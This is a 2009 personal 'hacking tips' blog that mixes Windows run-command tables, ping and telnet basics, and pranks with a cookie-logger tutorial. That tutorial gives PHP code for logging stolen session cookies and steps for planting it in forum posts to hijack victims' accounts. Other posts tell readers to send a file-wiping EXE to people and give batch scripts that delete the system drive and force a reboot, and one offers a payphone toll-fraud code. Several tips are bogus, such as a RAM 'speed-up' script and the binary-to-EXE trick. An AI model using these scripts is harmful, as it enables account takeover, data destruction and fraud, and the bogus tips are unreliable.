Wednesday, March 18, 2009
Receive your emails on ur mobile
http://www.m3m.in
use ur mobile number As login id
Check ur mobile quality(nokia)
if 7th & 8th digit is
00-best & orginal
01 or 10-good
02 or 20-not good
08 or 80-bad
13-very bad
Forgot ur NOKIA security code?
http://www.nokialockcode.com/mastercode.php
Ur Name in Task Bar:
>Control Panel
>Regional & Language Options
Customize
>Time
>AM Symbol
> type name
SPEED UP Ur PC
>NOTEPAD
>type
FREEMEM=SPACE(64000000)
>sa ve it wth name-ram.vbs
>now run d script
DONE
Tuesday, March 10, 2009
Create a CookieLogger and Hack any Account
Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger?
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …
Step 1: Save the notepad file from the link below and Rename it as Fun.gif:
Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>
Step 3: Create a new Notepad File and Save it as logfile.txt
Step 4: Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
http://0fees.net
Step 5: Go to the victim forum and insert this code in the signature or a post :
Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9
Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.
Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.
Saturday, March 7, 2009
Network Hacking
-: Network Hacking :-Network Hacking is generally means gathering information about domain by using tools like Telnet, NslookUp, Ping, Tracert, Netstat, etc. It also includes OS Fingerprinting, Port Scaning and Port Surfing using various tools. Ping :- Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not. To ping a particular host the syntax is (at command prompt)-- c:/>ping hostname.com example:- c:/>ping www.google.com ![]() Various attributes used with 'Ping' command and their usage can be viewed by just typing c:/>ping at the command prompt. Netstat :- It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc. It's syntax is (at command prompt)-- c:/>netstat -n ![]() Telnet :- Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on particular port. When connected it grabs the daemon running on that port. The basic syntax of Telnet is (at command prompt)-- c:/>telnet hostname.com By default telnet connects to port 23 of remote computer. So, the complete syntax is- c:/>telnet www.hostname.com port example:- c:/>telnet www.yahoo.com 21 or c:/>telnet 192.168.0.5 21 Tracert :- It is used to trace out the route taken by the certain information i.e. data packets from source to destination. It's syntax is (at command prompt)-- c:/>tracert www.hostname.com example:- c:/>tracert www.insecure.in![]() Here "* * * Request timed out." indicates that firewall installed on that system block the request and hence we can't obtain it's IP address. various attributes used with tracert command and their usage can be viewed by just typing c:/>tracert at the command prompt. The information obtained by using tracert command can be further used to find out exact operating system running on target system. |
Wednesday, March 4, 2009
command
Program | Run Command |
Accessibility Controls | access.cpl |
Accessibility Wizard | accwiz |
Add Hardware Wizard | hdwwiz.cpl |
Add/Remove Programs | appwiz.cpl |
Administrative Tools | control admintools |
Adobe Acrobat ( if installed ) | acrobat |
Adobe Distiller ( if installed ) | acrodist |
Adobe ImageReady ( if installed ) | imageready |
Adobe Photoshop ( if installed ) | photoshop |
Automatic Updates | wuaucpl.cpl |
Basic Media Player | mplay32 |
Bluetooth Transfer Wizard | fsquirt |
Calculator | calc |
Ccleaner ( if installed ) | ccleaner |
C: Drive | c: |
Certificate Manager | cdrtmgr.msc |
Character Map | charmap |
Check Disk Utility | chkdsk |
Clipboard Viewer | clipbrd |
Command Prompt | cmd |
Command Prompt | command |
Component Services | dcomcnfg |
Computer Management | compmgmt.msc |
Compare Files | comp |
Control Panel | control |
Create a shared folder Wizard | shrpubw |
Date and Time Properties | timedate.cpl |
DDE Shares | ddeshare |
Device Manager | devmgmt.msc |
Direct X Control Panel ( if installed ) | directx.cpl |
Direct X Troubleshooter | dxdiag |
Disk Cleanup Utility | cleanmgr |
Disk Defragment | dfrg.msc |
Disk Partition Manager | diskmgmt.msc |
Display Properties | control desktop |
Display Properties | desk.cpl |
Display Properties (w/Appearance Tab Preselected ) | control color |
Dr. Watson System Troubleshooting Utility | drwtsn32 |
Driver Verifier Utility | verifier |
Ethereal ( if installed ) | ethereal |
Event Viewer | eventvwr.msc |
Files and Settings Transfer Tool | migwiz |
File Signature Verification Tool | sigverif |
Findfast | findfast.cpl |
Firefox | firefox |
Folders Properties | control folders |
Fonts | fonts |
Fonts Folder | fonts |
Free Cell Card Game | freecell |
Game Controllers | joy.cpl |
Group Policy Editor ( xp pro ) | gpedit.msc |
Hearts Card Game | mshearts |
Help and Support | helpctr |
Hyperterminal | hypertrm |
Hotline Client | hotlineclient |
Iexpress Wizard | iexpress |
Indexing Service | ciadv.msc |
Internet Connection Wizard | icwonn1 |
Internet Properties | inetcpl.cpl |
Internet Setup Wizard | inetwiz |
IP Configuration (Display Connection Configuration) | ipconfig /all |
IP Configuration (Display DNS Cache Contents) | ipconfig /displaydns |
IP Configuration (Delete DNS Cache Contents) | ipconfig /flushdns |
IP Configuration (Release All Connections) | ipconfig /release |
IP Configuration (Renew All Connections) | ipconfig /renew |
IP Configuration (Refreshes DHCP & Re-Registers DNS) | ipconfig /registerdns |
IP Configuration (Display DHCP Class ID) | ipconfig /showclassid |
IP Configuration (Modifies DHCP Class ID) | ipconfig /setclassid |
Java Control Panel ( if installed ) | jpicpl32.cpl |
Java Control Panel ( if installed ) | javaws |
Keyboard Properties | control keyboard |
Local Security Settings | secpol.msc |
Local Users and Groups | lusrmgr.msc |
Logs You Out of Windows | logoff |
Malicious Software Removal Tool | mrt |
Microsoft Access ( if installed ) | access.cpl |
Microsoft Chat | winchat |
Microsoft Excel ( if installed ) | excel |
Microsoft Diskpart | diskpart |
Microsoft Frontpage ( if installed ) | frontpg |
Microsoft Movie Maker | moviemk |
Microsoft Management Console | mmc |
Microsoft Narrator | narrator |
Microsoft Paint | mspaint |
Microsoft Powerpoint | powerpnt |
Microsoft Word ( if installed ) | winword |
Microsoft Syncronization Tool | mobsync |
Minesweeper Game | winmine |
Mouse Properties | control mouse |
Mouse Properties | main.cpl |
MS-Dos Editor | edit |
MS-Dos FTP | ftp |
Nero ( if installed ) | nero |
Netmeeting | conf |
Network Connections | control netconnections |
Network Connections | ncpa.cpl |
Network Setup Wizard | netsetup.cpl |
Notepad | notepad |
Nview Desktop Manager ( if installed ) | nvtuicpl.cpl |
Object Packager | packager |
ODBC Data Source Administrator | odbccp32 |
ODBC Data Source Administrator | odbccp32.cpl |
On Screen Keyboard | osk |
Opens AC3 Filter ( if installed ) | ac3filter.cpl |
Outlook Express | msimn |
Paint | pbrush |
Password Properties | password.cpl |
Performance Monitor | perfmon.msc |
Performance Monitor | perfmon |
Phone and Modem Options | telephon.cpl |
Phone Dialer | dialer |
Pinball Game | pinball |
Power Configuration | powercfg.cpl |
Printers and Faxes | control printers |
Printers Folder | printers |
Private Characters Editor | eudcedit |
Quicktime ( if installed ) | quicktime.cpl |
Quicktime Player ( if installed ) | quicktimeplayer |
Real Player ( if installed ) | realplay |
Regional Settings | intl.cpl |
Registry Editor | regedit |
Registry Editor | regedit32 |
Remote Access Phonebook | rasphone |
Remote Desktop | mstsc |
Removable Storage | ntmsmgr.msc |
Removable Storage Operator Requests | ntmsoprq.msc |
Resultant Set of Policy ( xp pro ) | rsop.msc |
Scanners and Cameras | sticpl.cpl |
Scheduled Tasks | control schedtasks |
Security Center | wscui.cpl |
Services | services.msc |
Shared Folders | fsmgmt.msc |
Sharing Session | rtcshare |
Shuts Down Windows | shutdown |
Sounds Recorder | sndrec32 |
Sounds and Audio | mmsys.cpl |
Spider Solitare Card Game | spider |
SQL Client Configuration | clicongf |
System Configuration Editor | sysedit |
System Configuration Utility | msconfig |
System File Checker Utility ( Scan Immediately ) | sfc /scannow |
System File Checker Utility ( Scan Once At Next Boot ) | sfc /scanonce |
System File Checker Utility ( Scan On Every Boot ) | sfc /scanboot |
System File Checker Utility ( Return to Default Settings) | sfc /revert |
System File Checker Utility ( Purge File Cache ) | sfc /purgecache |
System File Checker Utility ( Set Cache Size to Size x ) | sfc /cachesize=x |
System Information | msinfo32 |
System Properties | sysdm.cpl |
Task Manager | taskmgr |
TCP Tester | tcptest |
Telnet Client | telnet |
Tweak UI ( if installed ) | tweakui |
User Account Management | nusrmgr.cpl |
Utility Manager | utilman |
Volume Serial Number for C: | label |
Volume Control | sndvol32 |
Windows Address Book | wab |
Windows Address Book Import Utility | wabmig |
Windows Backup Utility ( if installed ) | ntbackup |
Windows Explorer | explorer |
Windows Firewall | firewall.cpl |
Windows Installer Details | msiexec |
Windows Magnifier | magnify |
Windows Management Infrastructure | wmimgmt.msc |
Windows Media Player | wmplayer |
Windows Messenger | msnsgs |
Windows Picture Import Wizard (Need camera connected) | wiaacmgr |
Windows System Security Tool | syskey |
Windows Script host settings | wscript |
Widnows Update Launches | wupdmgr |
Windows Version ( shows your windows version ) | winver |
Windows XP Tour Wizard | tourstart |
Wordpad | write |
Tuesday, February 24, 2009
Computer Tips
Program | Run Command |
Accessibility Controls | access.cpl |
Accessibility Wizard | accwiz |
Add Hardware Wizard | hdwwiz.cpl |
Add/Remove Programs | appwiz.cpl |
Administrative Tools | control admintools |
Adobe Acrobat ( if installed ) | acrobat |
Adobe Distiller ( if installed ) | acrodist |
Adobe ImageReady ( if installed ) | imageready |
Adobe Photoshop ( if installed ) | photoshop |
Automatic Updates | wuaucpl.cpl |
Basic Media Player | mplay32 |
Bluetooth Transfer Wizard | fsquirt |
Calculator | calc |
Ccleaner ( if installed ) | ccleaner |
C: Drive | c: |
Certificate Manager | cdrtmgr.msc |
Character Map | charmap |
Check Disk Utility | chkdsk |
Clipboard Viewer | clipbrd |
Command Prompt | cmd |
Command Prompt | command |
Component Services | dcomcnfg |
Computer Management | compmgmt.msc |
Compare Files | comp |
Control Panel | control |
Create a shared folder Wizard | shrpubw |
Date and Time Properties | timedate.cpl |
DDE Shares | ddeshare |
Device Manager | devmgmt.msc |
Direct X Control Panel ( if installed ) | directx.cpl |
Direct X Troubleshooter | dxdiag |
Disk Cleanup Utility | cleanmgr |
Disk Defragment | dfrg.msc |
Disk Partition Manager | diskmgmt.msc |
Display Properties | control desktop |
Display Properties | desk.cpl |
Display Properties (w/Appearance Tab Preselected ) | control color |
Dr. Watson System Troubleshooting Utility | drwtsn32 |
Driver Verifier Utility | verifier |
Ethereal ( if installed ) | ethereal |
Event Viewer | eventvwr.msc |
Files and Settings Transfer Tool | migwiz |
File Signature Verification Tool | sigverif |
Findfast | findfast.cpl |
Firefox | firefox |
Folders Properties | control folders |
Fonts | fonts |
Fonts Folder | fonts |
Free Cell Card Game | freecell |
Game Controllers | joy.cpl |
Group Policy Editor ( xp pro ) | gpedit.msc |
Hearts Card Game | mshearts |
Help and Support | helpctr |
Hyperterminal | hypertrm |
Hotline Client | hotlineclient |
Iexpress Wizard | iexpress |
Indexing Service | ciadv.msc |
Internet Connection Wizard | icwonn1 |
Internet Properties | inetcpl.cpl |
Internet Setup Wizard | inetwiz |
IP Configuration (Display Connection Configuration) | ipconfig /all |
IP Configuration (Display DNS Cache Contents) | ipconfig /displaydns |
IP Configuration (Delete DNS Cache Contents) | ipconfig /flushdns |
IP Configuration (Release All Connections) | ipconfig /release |
IP Configuration (Renew All Connections) | ipconfig /renew |
IP Configuration (Refreshes DHCP & Re-Registers DNS) | ipconfig /registerdns |
IP Configuration (Display DHCP Class ID) | ipconfig /showclassid |
IP Configuration (Modifies DHCP Class ID) | ipconfig /setclassid |
Java Control Panel ( if installed ) | jpicpl32.cpl |
Java Control Panel ( if installed ) | javaws |
Keyboard Properties | control keyboard |
Local Security Settings | secpol.msc |
Local Users and Groups | lusrmgr.msc |
Logs You Out of Windows | logoff |
Malicious Software Removal Tool | mrt |
Microsoft Access ( if installed ) | access.cpl |
Microsoft Chat | winchat |
Microsoft Excel ( if installed ) | excel |
Microsoft Diskpart | diskpart |
Microsoft Frontpage ( if installed ) | frontpg |
Microsoft Movie Maker | moviemk |
Microsoft Management Console | mmc |
Microsoft Narrator | narrator |
Microsoft Paint | mspaint |
Microsoft Powerpoint | powerpnt |
Microsoft Word ( if installed ) | winword |
Microsoft Syncronization Tool | mobsync |
Minesweeper Game | winmine |
Mouse Properties | control mouse |
Mouse Properties | main.cpl |
MS-Dos Editor | edit |
MS-Dos FTP | ftp |
Nero ( if installed ) | nero |
Netmeeting | conf |
Network Connections | control netconnections |
Network Connections | ncpa.cpl |
Network Setup Wizard | netsetup.cpl |
Notepad | notepad |
Nview Desktop Manager ( if installed ) | nvtuicpl.cpl |
Object Packager | packager |
ODBC Data Source Administrator | odbccp32 |
ODBC Data Source Administrator | odbccp32.cpl |
On Screen Keyboard | osk |
Opens AC3 Filter ( if installed ) | ac3filter.cpl |
Outlook Express | msimn |
Paint | pbrush |
Password Properties | password.cpl |
Performance Monitor | perfmon.msc |
Performance Monitor | perfmon |
Phone and Modem Options | telephon.cpl |
Phone Dialer | dialer |
Pinball Game | pinball |
Power Configuration | powercfg.cpl |
Printers and Faxes | control printers |
Printers Folder | printers |
Private Characters Editor | eudcedit |
Quicktime ( if installed ) | quicktime.cpl |
Quicktime Player ( if installed ) | quicktimeplayer |
Real Player ( if installed ) | realplay |
Regional Settings | intl.cpl |
Registry Editor | regedit |
Registry Editor | regedit32 |
Remote Access Phonebook | rasphone |
Remote Desktop | mstsc |
Removable Storage | ntmsmgr.msc |
Removable Storage Operator Requests | ntmsoprq.msc |
Resultant Set of Policy ( xp pro ) | rsop.msc |
Scanners and Cameras | sticpl.cpl |
Scheduled Tasks | control schedtasks |
Security Center | wscui.cpl |
Services | services.msc |
Shared Folders | fsmgmt.msc |
Sharing Session | rtcshare |
Shuts Down Windows | shutdown |
Sounds Recorder | sndrec32 |
Sounds and Audio | mmsys.cpl |
Spider Solitare Card Game | spider |
SQL Client Configuration | clicongf |
System Configuration Editor | sysedit |
System Configuration Utility | msconfig |
System File Checker Utility ( Scan Immediately ) | sfc /scannow |
System File Checker Utility ( Scan Once At Next Boot ) | sfc /scanonce |
System File Checker Utility ( Scan On Every Boot ) | sfc /scanboot |
System File Checker Utility ( Return to Default Settings) | sfc /revert |
System File Checker Utility ( Purge File Cache ) | sfc /purgecache |
System File Checker Utility ( Set Cache Size to Size x ) | sfc /cachesize=x |
System Information | msinfo32 |
System Properties | sysdm.cpl |
Task Manager | taskmgr |
TCP Tester | tcptest |
Telnet Client | telnet |
Tweak UI ( if installed ) | tweakui |
User Account Management | nusrmgr.cpl |
Utility Manager | utilman |
Volume Serial Number for C: | label |
Volume Control | sndvol32 |
Windows Address Book | wab |
Windows Address Book Import Utility | wabmig |
Windows Backup Utility ( if installed ) | ntbackup |
Windows Explorer | explorer |
Windows Firewall | firewall.cpl |
Windows Installer Details | msiexec |
Windows Magnifier | magnify |
Windows Management Infrastructure | wmimgmt.msc |
Windows Media Player | wmplayer |
Windows Messenger | msnsgs |
Windows Picture Import Wizard (Need camera connected) | wiaacmgr |
Windows System Security Tool | syskey |
Windows Script host settings | wscript |
Widnows Update Launches | wupdmgr |
Windows Version ( shows your windows version ) | winver |
Windows XP Tour Wizard | tourstart |
Wordpad | write |
Zoom Utility | igfxzoom |
Wednesday, February 11, 2009
Ping Test Guide for Macintosh OS X
![]() |
1)Double click on 'Macintosh HD' on your desktop. |
![]() |
2)Locate the 'Application' folder and double click to open the folder. |
![]() |
3)Locate the 'Utilities' folder and double click to open the folder. |
![]() |
4)Locate the 'Terminal' program and double click to start the program. |
![]() |
5)The terminal program window should represent a similar layout as above. |
![]() |
6)Type in the following command ping -c 4 130.102.2.15 then press Return or Enter |
![]() |
7)A correct response would look similar to the screenshot above. |
IMPORTANT If your computer has being setup correctly you should be able to get a response similar to step 7 A response similar to the screen bellow will indicate a problem with your settings or connection. |
![]() |
free talk from coin box
Check this talk free from 1 rupee coin box..
100% Works !
yes u can talk free from 1 rupee coin box
wht u hve 2 do is first pick up the reciever
dial *** then 68807 then first 7 no.s which u r calling then #" 999"
this 999 is for your limit u can talk 999 min so u can only press no.s like this for eg
333 , 444, 555 do 999 it will be better then #0
then insert the coin nd dial full number nd u can talk for 999 minutes free
full code ***68807 first seven no.s #999#0
imp thing ------ this only works on red 1 rupee coin box do it..
It works 100% !!!
Hide ur drives
How to Hide the drives(c:,d:,e:,a:...etc)
This is a great trick you can play on your friends. To disable the display of local or networked drives when you click My Computer.
1.Go to start->run.Type regedit.Now go to:
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
Now in the right pane create a new DWORD item and name it NoDrives(it is case sensitive). Now modify it's value and set it to 3FFFFFF (Hexadecimal) .Now restart your computer. So, now when you click on My Computer, no drives will be shown(all gone...). To enable display of drives in My Computer, simply delete this DWORD item that you created.Again restart your computer.You can now see all the drives again. Magic........lol....
Who Used Your Pc In Your Absence,what Did He Do?
start > run >eventvwr.msc
Events are stored in three log files: Application, Security, and System. These logs can be reviewed and archived.
For our purposes we want the System log. Click on "System" in the left-hand column for a list of events.
Look for a date and time when you weren't home and your computer should have been off.
double click on the eg: info n it will show u the detail.
You can also use this log to see how long someone was on the computer. Just look at the time the computer was turned on and off for that day.
Hope u all will like it.
Thnks n enjoy
Saturday, January 31, 2009
EMail Hacking
-: EMail Hacking :-All email communications on the internet are possible by two protocols: 1) Simple Mail Transfer Protocol (SMTP port-25) 2) Post Office Protocol (POP port-110) E-Mail hacking consists of various techniques as discussed below. 1) EMail Tracing :- Generally, the path taken by an email while travelling from sender to receiver can be explained by following diagram. ![]() The most effective and easiest way to trace an email is to analyze it's email headers. This can be done by just viewing the full header of received email. A typical email header looks something like this: The above email header gives us the following information about it's origin and path: a) Sender's email address :- atiles@destatis.de b) Source IP address :- 141.203.33.92 c) Source mail server :- dsl-189-160-34-89.prod-infinitum.com.mx d) Email client :- Thunderbird 2.0.0.6 |
Folder Lock Without Any Software
Any name will do.
Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
How to Format A HDD With Notepad
If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.
Step 1.
Copy The Following In Notepad Exactly as it says01001011000111110010010101010101010000011111100000
Step 2.
Save As An EXE Any Name Will Do
Step 3.
Send the EXE to People And Infect
OR
IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c: /Q/X — this will format your drive c:
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d: /Q/X — this will format your dirve d:
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a: /Q/X — this will format your drive a:
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C: *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
akash tips & tricks
-
►
2009
(327)
- ► Jan 11 - Jan 18 (6)
- ► Jan 25 - Feb 1 (7)
- ► Feb 8 - Feb 15 (4)
- ► Feb 22 - Mar 1 (1)
- ► Mar 1 - Mar 8 (4)
- ► Mar 8 - Mar 15 (1)
- ► Mar 15 - Mar 22 (7)
- ► Mar 22 - Mar 29 (5)
- ► Apr 5 - Apr 12 (11)
- ► Apr 12 - Apr 19 (3)
- ► Apr 19 - Apr 26 (3)
- ► Apr 26 - May 3 (20)
- ► May 3 - May 10 (28)
- ► May 10 - May 17 (19)
- ► May 17 - May 24 (27)
- ► May 24 - May 31 (47)
- ► May 31 - Jun 7 (7)
- ► Jun 7 - Jun 14 (23)
- ► Jun 14 - Jun 21 (2)
- ► Jun 21 - Jun 28 (10)
- ► Jul 12 - Jul 19 (8)
- ► Jul 19 - Jul 26 (62)
- ► Jul 26 - Aug 2 (8)
- ► Aug 2 - Aug 9 (1)
- ► Aug 30 - Sep 6 (1)
- ► Sep 6 - Sep 13 (3)
- ► Sep 20 - Sep 27 (1)
- ► Sep 27 - Oct 4 (3)
- ► Oct 25 - Nov 1 (1)
- ► Nov 15 - Nov 22 (3)
- ► Nov 22 - Nov 29 (1)
-
▼
2010
(2)
- ► Jul 25 - Aug 1 (1)
- ▼ Aug 15 - Aug 22 (1)
About Me

- akash007
- mumbai, mumbai, India
- akash....... hacking tips & track plz use only for knowledge plz dont use misuse..........